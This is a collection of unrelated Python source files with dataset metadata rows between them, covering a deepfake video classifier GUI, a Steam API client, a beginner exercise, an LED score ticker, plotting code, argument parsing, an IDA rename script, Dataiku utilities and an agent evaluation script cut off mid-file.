    if image is None or (isinstance(image, np.ndarray) and image.size == 0):
        raise ValueError('crop() received an empty image')
    return cv2.resize(image[y0:y0 + h, x0:x0 + w], (224, 224))
def prediccion(filename):
    """Score sampled frames of *filename* with the deepfake model.

    Reads one frame every 150, detects faces with the module-level MTCNN
    detector, predicts a fake-probability per confident face, then hands the
    mean score to video2() for display.
    """
    m_pred = []   # per-face model scores across sampled frames
    count = 0     # frame index of the next sample
    cap = cv2.VideoCapture(filename)
    while cap.isOpened():
        success, image = cap.read()
        if success:
            # OpenCV decodes BGR; the detector/model expect RGB.
            image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
            face_locations = detector.detect_faces(image)
            if len(face_locations) > 0:
                for person in face_locations:
                    if person['confidence'] > 0.95:
                        i = 0  # NOTE(review): this counter is never used
                        bounding_box = person['box']
                        keypoints = person['keypoints']
                        confidence = person['confidence']
                        # NOTE(review): this rebinding clobbers the frame, so
                        # a second face in the same frame would crop from the
                        # 4-D batch array -- verify multi-face behaviour.
                        image = np.expand_dims(crop(bounding_box, image), axis=0)
                        PRED = model.predict(image)[0][0]
                        m_pred.append(PRED)
                        i += 1
            # Skip ahead 150 frames before the next sample.
            count += 150
            #count += int(cap.get(cv2.CAP_PROP_FRAME_COUNT) / 20)
            cap.set(1, count)
        else:
            cap.release()
            break
    return video2(filename, np.mean(m_pred))
# esta funcion no crea un nuevo video, sino que solo muestra la prediccion en el video entregado.
def video2(filename, pred):
    """Replay the video and draw the classification result on each
    detected face: red/FAKE when pred >= 0.5, green/REAL otherwise.
    Press 'q' to stop playback early.

    filename -- path of the video that was scored
    pred     -- mean fake-probability produced by prediccion()
    """
    cap = cv2.VideoCapture(filename)
    if not cap.isOpened():
        print("Error al abrir el video")
    while cap.isOpened():
        success, image = cap.read()
        if not success:
            break
        face_locations = detector.detect_faces(image)
        for person in face_locations:
            if person['confidence'] > 0.95:
                bounding_box = person['box']
                # Single drawing path; only the label and colour depend on
                # the prediction (the original duplicated this block).
                if pred >= 0.5:
                    label, color = "FAKE", (0, 0, 255)
                else:
                    label, color = "REAL", (0, 255, 0)
                cv2.rectangle(image,
                              (bounding_box[0], bounding_box[1]),
                              (bounding_box[0] + bounding_box[2], bounding_box[1] + bounding_box[3]),
                              color,
                              2)
                text = label + " - " + str(pred)
                cv2.putText(image, str(text), (bounding_box[0], bounding_box[1] - 5),
                            cv2.FONT_HERSHEY_SIMPLEX, 1, color, 2, cv2.LINE_AA)
        cv2.imshow('Prediccion Video', image)
        key = cv2.waitKey(1)
        if key & 0xFF == ord('q'):
            break
    # Resource fix: the original never released the capture nor closed
    # the preview window.
    cap.release()
    cv2.destroyAllWindows()
def cargar_archivo():
    """Ask the user to pick a video file and run the classifier on it."""
    prediccion(askopenfilename())
# Background image for the main window.
img3 = Image.open("facial.png")
render2 = ImageTk.PhotoImage(img3)
img_3 = Label(ventana, image=render2, bd=0)
img_3.place(x=0,y=0)
# Button that opens the file picker and starts the classification.
img2 = PhotoImage(file="button.png")
b1 = Button(ventana, image= img2, bd=0, command=cargar_archivo)
b1.place(x=260,y=640)
ventana.mainloop()  # blocks until the window is closed
| 32.15748 | 140 | 0.540157 | 495 | 4,084 | 4.341414 | 0.335354 | 0.097255 | 0.039088 | 0.05584 | 0.290368 | 0.290368 | 0.290368 | 0.290368 | 0.290368 | 0.249418 | 0 | 0.052906 | 0.342801 | 4,084 | 126 | 141 | 32.412698 | 0.747765 | 0.039177 | 0 | 0.277778 | 0 | 0 | 0.04797 | 0 | 0.018519 | 0 | 0.001054 | 0 | 0 | 1 | 0.037037 | false | 0.018519 | 0.101852 | 0 | 0.157407 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e581386b587edbff364859416ea64e6cd9f12b6 | 399 | py | Python | crawlers/base.py | Saphyel/steamhelp | 50ea7071fe43dc59f53b05d9e255ffe44c789f6c | [
"MIT"
] | null | null | null | crawlers/base.py | Saphyel/steamhelp | 50ea7071fe43dc59f53b05d9e255ffe44c789f6c | [
"MIT"
] | 1 | 2021-06-02T02:56:36.000Z | 2021-06-02T02:56:36.000Z | crawlers/base.py | Saphyel/masterofgames | 486fc330778b7f5d8150b5ba47fc6662bcb2ff06 | [
"MIT"
] | null | null | null | __strict__ = True
import httpx
from core.config import Config
async def client_fetch(endpoint: str, payload: dict = None) -> dict:
    """GET `endpoint` from the Steam Web API and return the decoded JSON.

    endpoint -- path appended to https://api.steampowered.com
    payload  -- optional query parameters; the API key is added for you
    Raises httpx.HTTPStatusError on a non-2xx response.

    Bug fix: the original crashed with AttributeError when called with
    the default payload=None (`None.update(...)`); it also mutated the
    caller's dict by injecting the API key into it. We copy instead.
    """
    payload = dict(payload) if payload else {}
    payload["key"] = Config.STEAM_API_KEY
    async with httpx.AsyncClient() as client:
        result = await client.get("https://api.steampowered.com" + endpoint, params=payload, timeout=10)
        result.raise_for_status()
        return result.json()
| 28.5 | 104 | 0.701754 | 52 | 399 | 5.211538 | 0.711538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006135 | 0.182957 | 399 | 13 | 105 | 30.692308 | 0.825153 | 0 | 0 | 0 | 0 | 0 | 0.077694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5ab61913224cc7ea06a3d96f8c73df05bb03c2 | 1,925 | py | Python | pythonaulas/Aula 15/Desafio 069.py | jrwarg/Estudos-Phyton | 2207ec1ee9880501e12fbfecf7dfaaf38bb2ebca | [
"MIT"
] | null | null | null | pythonaulas/Aula 15/Desafio 069.py | jrwarg/Estudos-Phyton | 2207ec1ee9880501e12fbfecf7dfaaf38bb2ebca | [
"MIT"
] | null | null | null | pythonaulas/Aula 15/Desafio 069.py | jrwarg/Estudos-Phyton | 2207ec1ee9880501e12fbfecf7dfaaf38bb2ebca | [
"MIT"
] | null | null | null | """
DESAFIO 069: Análise de Dados do Grupo
Crie um programa que leia a idade e o sexo de várias pessoas. A cada pessoa cadastrada,
o programa deverá perguntar se o usuário quer ou não continuar. No final, mostre:
A) Quantas pessoas têm mais de 18 anos.
B) Quantos homens foram cadastrados.
C) Quantas mulheres têm menos de 20 anos.
"""
# Counters for the three statistics requested by the exercise.
sep = '-' * 50
maioresde18 = 0      # people older than 18
homens = 0           # registered men
mulheresmenos20 = 0  # women younger than 20
contador = 0         # total people registered
while True:
    print(sep)
    titulo = f'PESSOA Nº {contador + 1}'
    print(f'{titulo:^50}')
    print(sep)
    idade = int(input('Idade: '))
    sexo = 'I'
    while sexo != 'M' and sexo != 'F':
        # Bug fix: the original indexed [0] before checking for empty
        # input, raising IndexError when the user just pressed Enter.
        resposta = input('Sexo [M/F]: ').strip().upper()
        if resposta:
            sexo = resposta[0].replace(' ', '')
    if idade > 18:
        maioresde18 += 1
    if sexo == 'M':
        homens += 1
    if sexo == 'F' and idade < 20:
        mulheresmenos20 += 1
    contador += 1
    continuar = 'I'
    print(sep)
    while continuar != 'S' and continuar != 'N':
        resposta = input('Quer cadastrar outra pessoa [S/N]? ').strip().upper()
        if resposta:
            continuar = resposta[0].replace(' ', '')
    print(sep)
    print('')
    if continuar == 'N':
        break
# Final report: phrasing adapts to 0 / 1 / many for each statistic.
if contador == 1:
    print('Você cadastrou somente 1 pessoa. Deste número,', end=' ')
else:
    print(f'Você cadastrou {contador} pessoas no total. Deste número,', end=' ')
if maioresde18 == 0:
    print('nenhuma tem mais de 18 anos,', end=' ')
elif maioresde18 == 1:
    print('1 tem mais de 18 anos,', end=' ')
else:
    print(f'{maioresde18} têm mais de 18 anos,', end=' ')
if homens == 0:
    print('nenhum é homem,', end=' ')
elif homens == 1:
    print('1 é homem,', end=' ')
else:
    print(f'{homens} são homens,', end=' ')
if mulheresmenos20 == 0:
    print('e nenhuma mulher tem menos de 20 anos.')
elif mulheresmenos20 == 1:
    print('e 1 mulher tem menos de 20 anos.')
else:
    print(f'e {mulheresmenos20} mulheres têm menos de 20 anos.')
| 27.5 | 87 | 0.603636 | 277 | 1,925 | 4.194946 | 0.32491 | 0.025818 | 0.027539 | 0.041308 | 0.138554 | 0.110155 | 0 | 0 | 0 | 0 | 0 | 0.047521 | 0.245714 | 1,925 | 69 | 88 | 27.898551 | 0.752755 | 0.170909 | 0 | 0.150943 | 0 | 0 | 0.290932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.320755 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5babce487a774c4669c2b615801033f39b7cba | 1,941 | py | Python | ticker/scores_ticker.py | dspec12/LED-Sports-Score-Ticker | 41cd2fcb5eebf6a43151f5f06067b44c60462508 | [
"MIT"
] | 1 | 2020-09-17T14:37:47.000Z | 2020-09-17T14:37:47.000Z | ticker/scores_ticker.py | dspec12/LED-Sports-Score-Ticker | 41cd2fcb5eebf6a43151f5f06067b44c60462508 | [
"MIT"
] | 1 | 2020-12-22T01:59:55.000Z | 2020-12-22T01:59:55.000Z | ticker/scores_ticker.py | dspec12/led-sports-score-ticker | 41cd2fcb5eebf6a43151f5f06067b44c60462508 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import os
import time
import requests
from rgbmatrix import RGBMatrix, RGBMatrixOptions, graphics
# Configuration for the matrix
options = RGBMatrixOptions()  # hardware configuration for the LED panel
options.scan_mode = 0
options.pwm_lsb_nanoseconds = 130
options.pwm_bits = 11
options.show_refresh_rate = 0
options.gpio_slowdown = 2
options.rows = 16
options.chain_length = 4  # four panels chained horizontally
options.parallel = 1
options.hardware_mapping = "adafruit-hat-pwm"
options.drop_privileges=False
# Display settings: BDF font (looked up next to this script), RGB text
# colour, and seconds slept between one-pixel scroll steps.
font_filename = "9x15B.bdf"
text_color = 4, 106, 56
ticker_speed = 0.03
def grab_scores():
    """Download the latest ticker text from S3.

    Returns the scores string, or an empty string on any error so the
    ticker keeps scrolling -- the original implicitly returned None from
    the except branches, which would crash graphics.DrawText downstream.
    """
    url = "https://led-sports-score-ticker.s3.amazonaws.com/scores.txt"
    try:
        scores = requests.get(url)
        return scores.text
    except requests.exceptions.ConnectionError as e:
        print("Could not connect to endpoint:")
        print(e)
    except requests.exceptions.HTTPError as e:
        print("Http error:")
        print(e)
    except Exception as e:
        print("Unknown error:")
        print(type(e))
        print(e)
    return ""
def led_scroll_text():
    """Scroll the scores text across the LED matrix forever, re-fetching
    the scores each time the text fully wraps around."""
    matrix = RGBMatrix(options=options)
    offscreen_canvas = matrix.CreateFrameCanvas()
    cwd = os.path.dirname(__file__)
    font_path = os.path.join(cwd, font_filename)
    font = graphics.Font()
    font.LoadFont(font_path)
    textColor = graphics.Color(*text_color)
    pos = offscreen_canvas.width
    scroll_text = grab_scores()
    count = 0
    while True:
        offscreen_canvas.Clear()
        # Fix: the original shadowed the builtin `len` with the pixel
        # width returned by DrawText.
        text_width = graphics.DrawText(offscreen_canvas, font, pos, 13, textColor, scroll_text)
        pos -= 1
        if pos + text_width < 0:
            # Text fully scrolled off the left edge: restart on the right.
            pos = offscreen_canvas.width
            count += 1
            if count >= 1:
                count = 0
                print("Refreshing scores...")
                scroll_text = grab_scores()
        time.sleep(ticker_speed)
        offscreen_canvas = matrix.SwapOnVSync(offscreen_canvas)
if __name__ == "__main__":
    # Entry point: scrolls forever until the process is killed.
    print("Starting...")
    led_scroll_text()
| 25.88 | 88 | 0.667697 | 243 | 1,941 | 5.139918 | 0.481481 | 0.084067 | 0.019215 | 0.036829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022788 | 0.231324 | 1,941 | 74 | 89 | 26.22973 | 0.814343 | 0.02576 | 0 | 0.147541 | 0 | 0 | 0.09423 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0 | 0.081967 | 0 | 0.131148 | 0.147541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5bd1f2581c4fc1b5ee0568b2671c3f8232e0f1 | 2,332 | py | Python | post.py | DMistry13/IPT-Sparkler | e1d4411866f736190362c63170bdfbebf0c0f730 | [
"CC0-1.0"
] | null | null | null | post.py | DMistry13/IPT-Sparkler | e1d4411866f736190362c63170bdfbebf0c0f730 | [
"CC0-1.0"
] | null | null | null | post.py | DMistry13/IPT-Sparkler | e1d4411866f736190362c63170bdfbebf0c0f730 | [
"CC0-1.0"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def graphs(file,fps,sc,ff,d,center):
    """Build and save the analysis plots for one tracked recording.

    file   -- CSV with columns cx, cy, n (frame index), v (speed)
    fps    -- frames per second of the recording
    sc     -- pixel-to-cm scale factor
    ff     -- recording identifier used in plot titles and filenames
    d      -- output directory where the PNG files are written
    center -- x pixel coordinate taken as the origin for distances
    """
    df = pd.read_csv(file, index_col=False)
    df = pd.DataFrame(df, columns= ['cx','cy','n','v'])
    nn = []    # number of detected particles per frame
    mnvl = []  # mean x position per frame
    sdd = []   # NOTE(review): never used below -- kept as-is
    #to get number of repeats
    for i in range(int(min(df["n"])),int(max(df["n"]))):
        c = df.loc[df['n'] == i]
        num = len(c["cx"])
        mnval = np.mean(c["cx"])
        nn.append(num)
        mnvl.append(mnval)
    # One figure per plot so each can be saved independently.
    fig1, ax1 = plt.subplots()
    fig2, ax2 = plt.subplots()
    fig3, ax3 = plt.subplots()
    fig4, ax4 = plt.subplots()
    fig5, ax5 = plt.subplots()
    fig6, ax6 = plt.subplots()
    v = df["v"] #v
    cx = df["cx"] #cx
    n = df["n"] #frames
    t = n/fps
    x = cx
    v = v*sc
    # Distances are measured from `center` and converted to cm via `sc`.
    ax1.plot(t,np.abs(np.array(x)-center)*sc,"rx")
    ax2.plot(t,v,"rx")
    ax4.plot(np.abs(np.array(x)-center)*sc,v,"rx")
    ax3.plot(np.linspace(1,len(nn),len(nn)),nn,"rx")
    ax5.plot(np.linspace(1,len(mnvl),len(mnvl)),(np.array(mnvl) - center)*sc,"b--")
    ax6.hist(np.abs((x-center)*sc),bins=100)
    print(d+"\\Making XDT for " +str(ff))
    ax1.set_ylabel("x-distance (cm)")
    ax1.set_xlabel("Time (s)")
    ax1.set_title("Graph of x-distance against Time of recording " + str(ff))
    ax1.grid()
    fig1.savefig(d+'\\XDT'+str(ff)+'.png')
    print("XDT done, making VT for " +str(ff))
    ax2.set_ylabel("Speed (cm per sec)")
    ax2.set_xlabel("Time (s)")
    ax2.set_title("Graph of speed against Time of recording " + str(ff))
    ax2.grid()
    fig2.savefig(d+'\\VT'+str(ff)+'.png')
    print("VT done, making MPPFT for " +str(ff))
    ax3.set_ylabel("Number of particles per frame")
    ax3.set_xlabel("Time (s)")
    ax3.set_title("Number of particles per frame against Time of recording " + str(ff))
    ax3.grid()
    fig3.savefig(d+'\\NPPFT'+str(ff)+'.png')
    print("NPPFT done, making VX for " +str(ff))
    ax4.set_ylabel("Speed (cm per sec)")
    ax4.set_xlabel("x-distance (cm)")
    ax4.set_title("Speed against x-distance of recording " + str(ff))
    ax4.grid()
    fig4.savefig(d+'\\VX'+str(ff)+'.png')
    fig5.savefig(d+'\\MN'+str(ff)+'.png')
    fig6.savefig(d+'\\hist'+str(ff)+'.png')
    print("VX done for " +str(ff))
print("Number ppf: " + str(np.mean(nn))) | 37.015873 | 88 | 0.566038 | 378 | 2,332 | 3.455026 | 0.283069 | 0.057427 | 0.036753 | 0.049005 | 0.193721 | 0.127871 | 0.032159 | 0 | 0 | 0 | 0 | 0.024972 | 0.227273 | 2,332 | 63 | 89 | 37.015873 | 0.699778 | 0.014151 | 0 | 0 | 0 | 0 | 0.223366 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.04918 | 0 | 0.065574 | 0.098361 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5cac362fd7becca5b4e9afc47ee9bbe359228c | 3,623 | py | Python | Asura/options.py | ChunhuiWang-China/Asura | 751b3e7b7e69b612092dc39f60a1289ccd2fdacf | [
"Apache-2.0"
] | null | null | null | Asura/options.py | ChunhuiWang-China/Asura | 751b3e7b7e69b612092dc39f60a1289ccd2fdacf | [
"Apache-2.0"
] | null | null | null | Asura/options.py | ChunhuiWang-China/Asura | 751b3e7b7e69b612092dc39f60a1289ccd2fdacf | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright (C) 2020 ATHENA AUTHORS; Chunhui Wang
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import sys
from Asura import utils
def get_preprocessing_parser():
    """Placeholder: the preprocessing CLI parser is not implemented yet."""
    pass
def get_parser(descript):
    """Build the common Asura command-line argument parser.

    descript -- description text shown in --help output
    Returns the configured argparse.ArgumentParser. (Bug fix: the
    original built the parser but never returned it, so callers got
    None; `descript` was also accepted but never used.)
    """
    # Pre-parse only --user-dir so optional user models can be imported
    # before the full parser is constructed.
    usr_parser = argparse.ArgumentParser(add_help=False, allow_abbrev=False)
    usr_parser.add_argument("--user-dir", default=None)
    usr_args, _ = usr_parser.parse_known_args()
    utils.import_user_module(usr_args)

    parser = argparse.ArgumentParser(allow_abbrev=False, description=descript)
    parser.add_argument('--no-progress-bar', action='store_true', help='disable progress bar')
    parser.add_argument('--log-interval', type=int, default=1000, metavar='N',
                        help='log progress every N batches (when progress bar is disabled)')
    parser.add_argument('--log-format', default=None, help='log format to use',
                        choices=['json', 'none', 'simple', 'tqdm'])
    parser.add_argument('--tensorboard-logdir', metavar='DIR', default='',
                        help='path to save logs for tensorboard, should match --logdir '
                             'of running tensorboard (default: no tensorboard logging)')
    parser.add_argument('--seed', default=1, type=int, metavar='N',
                        help='pseudo random number generator seed')
    parser.add_argument('--cpu', action='store_true', help='use CPU instead of CUDA')
    parser.add_argument('--fp16', action='store_true', help='use FP16')
    parser.add_argument('--memory-efficient-fp16', action='store_true',
                        help='use a memory-efficient version of FP16 training; implies --fp16')
    parser.add_argument('--fp16-no-flatten-grads', action='store_true',
                        help='don\'t flatten FP16 grads tensor')
    parser.add_argument('--fp16-init-scale', default=2 ** 7, type=int,
                        help='default FP16 loss scale')
    parser.add_argument('--fp16-scale-window', type=int,
                        help='number of updates before increasing loss scale')
    parser.add_argument('--fp16-scale-tolerance', default=0.0, type=float,
                        help='pct of updates that can overflow before decreasing the loss scale')
    parser.add_argument('--min-loss-scale', default=1e-4, type=float, metavar='D',
                        help='minimum FP16 loss scale, after which training is stopped')
    parser.add_argument('--threshold-loss-scale', type=float,
                        help='threshold FP16 loss scale from below')
    parser.add_argument('--user-dir', default=None,
                        help='path to a python module containing custom extensions (tasks and/or architectures)')
    parser.add_argument('--empty-cache-freq', default=0, type=int,
                        help='how often to clear the PyTorch CUDA cache (0 to disable)')
    parser.add_argument('--all-gather-list-size', default=16384, type=int,
                        help='number of bytes reserved for gathering stats from workers')
    return parser
| 55.738462 | 113 | 0.648358 | 464 | 3,623 | 4.978448 | 0.426724 | 0.07013 | 0.132468 | 0.041126 | 0.120346 | 0.083117 | 0.060606 | 0 | 0 | 0 | 0 | 0.018675 | 0.216671 | 3,623 | 64 | 114 | 56.609375 | 0.795278 | 0.191002 | 0 | 0 | 0 | 0 | 0.38414 | 0.038448 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0.023256 | 0.093023 | 0 | 0.139535 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5f0a4fe7e7e73e2f32d387064e5e6f466c4d4a | 678 | py | Python | hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | import idc
import idaapi
import idautils
def rename_sub_functions(fva, prefix):
    """Prefix the names of every function referenced (xref'd) from the
    function that starts at address `fva`, skipping already-prefixed ones."""
    referenced_funcs = set()
    for func_ea in idautils.Functions():
        for xref in idautils.XrefsTo(func_ea):
            caller = idaapi.get_func(xref.frm)
            if caller and caller.startEA == fva:
                referenced_funcs.add(func_ea)
                break
    for func_ea in referenced_funcs:
        old_name = idc.GetFunctionName(func_ea)
        if not old_name.startswith(prefix):
            idc.MakeName(func_ea, prefix + old_name)
if __name__ == '__main__':
    # Rename every function referenced from the function under the cursor.
    rename_sub_functions(idc.ScreenEA(), "test_")
5e612b9caed715a208be676dea31ebb9476b48db | 1,785 | py | Python | python-lib/dku_utils.py | dataiku/dss-plugin-api-connect | 805e14dd9cd41e889219cacd5de124b2c9488cfc | [
"Apache-2.0"
] | 2 | 2021-05-21T19:16:42.000Z | 2021-12-10T08:02:30.000Z | python-lib/dku_utils.py | dataiku/dss-plugin-api-connect | 805e14dd9cd41e889219cacd5de124b2c9488cfc | [
"Apache-2.0"
] | 10 | 2021-05-25T00:03:28.000Z | 2022-03-29T15:01:41.000Z | python-lib/dku_utils.py | dataiku/dss-plugin-api-connect | 805e14dd9cd41e889219cacd5de124b2c9488cfc | [
"Apache-2.0"
] | 2 | 2021-05-28T10:41:35.000Z | 2022-02-04T08:14:47.000Z | import json
import copy
def get_dku_key_values(endpoint_query_string):
    """Convert the plugin's list of {"from": ..., "to": ...} rows into a
    plain dict, skipping rows whose "from" key is missing or falsy."""
    key_values = {}
    for row in endpoint_query_string:
        source = row.get("from")
        if source:
            key_values[source] = row.get("to")
    return key_values
def get_endpoint_parameters(configuration):
    """Extract the recognised endpoint settings from a plugin
    configuration dict, dropping keys that are absent or None
    (falsy values such as 0, "" or False are kept)."""
    endpoint_parameters = [
        "endpoint_url",
        "http_method",
        "endpoint_query_string",
        "endpoint_body",
        "endpoint_headers",
        "body_format",
        "text_body",
        "key_value_body",
        "extraction_key",
        "raw_output",
        "ignore_ssl_check",
        "timeout",
        "requests_per_minute",
        "pagination_type",
        "next_page_url_key",
        "top_key", "skip_key", "maximum_number_rows"
    ]
    parameters = {}
    for name in endpoint_parameters:
        value = configuration.get(name)
        if value is not None:
            parameters[name] = value
    return parameters
def parse_keys_for_json(items):
    """Flatten a dict for JSON-friendly output: nested dicts/lists are
    serialized to JSON strings, None entries are dropped, and every
    other value is kept unchanged."""
    flattened = {}
    for key, value in items.items():
        if value is None:
            continue
        if isinstance(value, (dict, list)):
            flattened[key] = json.dumps(value)
        else:
            flattened[key] = value
    return flattened
def get_value_from_path(dictionary, path, default=None, can_raise=True):
    """Walk `path` (a sequence of keys) into a nested dict and return the
    value found there.

    dictionary -- nested dict to search (deep-copied so the returned
                  value never aliases the caller's data)
    path       -- sequence of keys to follow
    default    -- value returned when the path is missing and can_raise
                  is False
    can_raise  -- when True, raise ValueError on a missing key instead
                  of returning default/None

    Bug fix: the original tested `elif default:`, so falsy defaults
    (0, "", False, []) were silently ignored and None was returned.
    """
    ret = copy.deepcopy(dictionary)
    for key in path:
        # isinstance checked first so a non-dict intermediate value takes
        # the error path instead of raising TypeError on `key in ret`.
        if isinstance(ret, dict) and key in ret:
            ret = ret.get(key)
        else:
            error_message = "The extraction path {} was not found in the incoming data".format(path)
            if can_raise:
                raise ValueError(error_message)
            if default is not None:
                return default
            return None
    return ret
| 30.254237 | 175 | 0.620728 | 212 | 1,785 | 4.971698 | 0.372642 | 0.045541 | 0.05408 | 0.028463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285154 | 1,785 | 58 | 176 | 30.775862 | 0.826019 | 0.014566 | 0 | 0.1 | 0 | 0 | 0.174161 | 0.011952 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.04 | 0.02 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e612c811f3062b1a02b66228faab15470efaa06 | 3,673 | py | Python | agents/rule_based/run_rulebased_agent.py | didi/MEEP | eb668fe598e40d244f204363d360babbe1fe0dc2 | [
"Apache-2.0"
] | 17 | 2020-09-09T02:32:14.000Z | 2021-10-01T09:46:40.000Z | agents/rule_based/run_rulebased_agent.py | didi/MEEP | eb668fe598e40d244f204363d360babbe1fe0dc2 | [
"Apache-2.0"
] | 2 | 2020-12-02T09:10:03.000Z | 2020-12-02T20:31:05.000Z | agents/rule_based/run_rulebased_agent.py | didi/MEEP | eb668fe598e40d244f204363d360babbe1fe0dc2 | [
"Apache-2.0"
] | 3 | 2020-10-10T09:14:43.000Z | 2022-01-18T02:36:31.000Z | '''Tool to see how well this agent performs on training data'''
import os
import sys
import json
from glob import glob
from keys import keys
sys.path.extend([
# for loading main backend stuff
os.path.join(sys.path[0], '../../gui/backend'),
os.path.join(sys.path[0], '../..') # for loading agents, apis
])
# remove current directory to eliminate naming conflict with utils
sys.path = sys.path[1:]
from app_factory import AppFactory
from apis import MapInterface
from agents.agent import create_agent
def prepare_two_turn_dataset(split="train", dataset_dir=None):
    """Load dialog JSONs and return the first two user turns of every
    dialog that contains at least two user turns.

    split       -- dataset split name, used to build the default directory
    dataset_dir -- optional override for the directory containing the
                   *.json dialog files (generalized from the previously
                   hard-coded shared path; backward compatible)

    Consecutive user utterances are merged into a single turn. Files that
    fail to parse are skipped with a warning.
    """
    if dataset_dir is None:
        dataset_dir = '/home/shared/speech_based_destination_chat/dataset/json/%s' % split
    dialog_jsons = []
    for fname in sorted(glob(dataset_dir + "/*.json")):
        with open(fname) as f:
            try:
                dialog_jsons.append(json.load(f))
            except json.decoder.JSONDecodeError:
                print("Warning couldn't decode json in", fname)
    print("loaded %d dialogs" % len(dialog_jsons))
    two_turn_examples = []
    for dialog in dialog_jsons:
        user_utts = []
        prev_event_type = None
        for event in dialog['events']:
            # Stop once two user turns are collected and a non-user event
            # ends the second turn.
            if len(user_utts) == 2 and event['event_type'] != "user_utterance":
                break
            if event["event_type"] == "user_utterance":
                if prev_event_type == "user_utterance":
                    # Merge back-to-back user messages into one turn.
                    user_utts[-1] += " " + event['utterance']
                else:
                    user_utts.append(event['utterance'])
            prev_event_type = event['event_type']
        assert len(user_utts) <= 2
        if len(user_utts) == 2:
            two_turn_examples.append(user_utts)
    return two_turn_examples
def get_received(socket_client):
    """Collect the bodies of every '/message' event emitted by the agent
    from the socket test client's received buffer."""
    agent_bodies = []
    for msg in socket_client.get_received():
        if msg['name'] != '/message':
            continue
        payload = msg['args'][0]
        if payload['sender'] == 'agent':
            agent_bodies.append(payload['body'])
    return agent_bodies
if __name__ == '__main__':
    # Set up message passing and agent
    destination_app = AppFactory(
        [MapInterface(map_provider='google', api_key=keys['google_maps'])])
    _flask_client, socket_client = destination_app.create_test_clients()
    agent = create_agent(
        'agents.rule_based_agent.RuleBasedAgent',
        lambda lat, long: None,
        destination_app.interfaces,
    )
    destination_app.set_agent(agent)
    # Consume startup messages
    socket_client.get_received()
    # Test agent by writing training data to it
    split = 'train'
    two_turn_examples = prepare_two_turn_dataset(split)
    out_fname = "two_turn_examples.%s.txt" % split
    with open(out_fname, "w") as out_f:
